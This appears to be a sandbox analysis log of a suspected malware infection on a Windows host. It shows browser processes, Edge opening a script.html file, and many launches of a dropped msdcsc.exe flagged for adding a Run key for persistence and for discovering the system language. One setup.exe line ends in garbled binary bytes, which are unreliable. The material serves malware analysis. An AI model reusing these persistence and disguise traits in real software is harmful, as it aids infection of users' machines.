        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
        5⤵
        
        PID:5936
- - C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --uninstall --system-levelÉÕÚº.Ì|Ÿaˆfñ,¼à[ CÈÆ"°î¯á²Ò.¤nžgé¨ìíÅ²§6H{r Vg õ±´ÉºÅH Ú’™ Èµ‰ÛqYRœ4xxW{BþÝÅdÛrxFÌW›
    3⤵
    - Drops file in Windows directory
    PID:3192
  - - C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x28c,0x290,0x294,0x268,0x298,0x7ff763ba1f58,0x7ff763ba1f64,0x7ff763ba1f70
      4⤵
      PID:3204
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\script.html
    3⤵
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of SendNotifyMessage
    PID:4200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffe941cf208,0x7ffe941cf214,0x7ffe941cf220
      4⤵
      PID:1348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1824,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:11
      4⤵
      PID:1552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2112,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:2
      4⤵
      PID:3476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:13
      4⤵
      PID:4356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3412,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:1
      4⤵
      PID:6444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3420,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1
      4⤵
      PID:5828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4968,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5012 /prefetch:1
      4⤵
      PID:6904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5196,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:14
      4⤵
      PID:780
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5192,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:14
      4⤵
      PID:4928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5648,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:14
      4⤵
      PID:1380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6048,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:14
      4⤵
      PID:1736
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
        
        cookie_exporter.exe --cookie-json=1124
        5⤵
        
        PID:6472
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6120,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:14
      4⤵
      PID:6016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6120,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:14
      4⤵
      PID:388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5736,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5792 /prefetch:1
      4⤵
      PID:5068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6136,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:14
      4⤵
      PID:4748
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3556,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:14
      4⤵
      PID:6520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3424,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3496 /prefetch:14
      4⤵
      PID:6264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5300,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:1
      4⤵
      PID:6532
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5352,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:14
      4⤵
      PID:1004
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5348,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:1
      4⤵
      PID:4908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6424,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:1
      4⤵
      PID:236
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3716 /prefetch:14
      4⤵
      PID:2364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6684,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3672 /prefetch:1
      4⤵
      PID:1372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=6836,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6768 /prefetch:1
      4⤵
      PID:3352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6440,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:14
      4⤵
      PID:6972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6776,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:14
      4⤵
      PID:6592
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5676,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:1
      4⤵
      PID:4500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6860,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6872 /prefetch:1
      4⤵
      PID:7044
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7308,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=7520 /prefetch:1
      4⤵
      PID:2528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6092,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:14
      4⤵
      PID:1620
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\script.html
    3⤵
    PID:4548
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\script.html
    3⤵
    PID:6132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:1196
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\TCP Subsystem\tcpss.exe
1⤵
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:1984
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:552
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:2284

C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\wt.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe" -d "C:\Users\Admin\Desktop\."
1⤵
PID:880
- C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe
  wt.exe -d "C:\Users\Admin\Desktop\."
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:4704
- - C:\Windows\system32\wsl.exe
    C:\Windows\system32\wsl.exe --list
    3⤵
    PID:2476
- - C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe
    "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe" --headless --win32input --resizeQuirk --width 120 --height 27 --signal 0xa1c --server 0xa18
    3⤵
    PID:776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:552
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:1088
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:4960
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:4192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:4948
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:1096
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:4192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6032
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:5640
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:5536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:5964
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:3008
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:1096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:4948
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:1076
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:4404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:2076
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:2056

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004B8
1⤵
PID:1164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:1264
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:2216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
  2⤵
  PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:3844
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
  2⤵
  PID:5384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1724,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2252 /prefetch:11
  2⤵
  PID:2336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=1892,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2176 /prefetch:13
  2⤵
  PID:5396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2224,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2220 /prefetch:2
  2⤵
  PID:4880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:2132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:3400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4132,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4444 /prefetch:1
  2⤵
  PID:6188
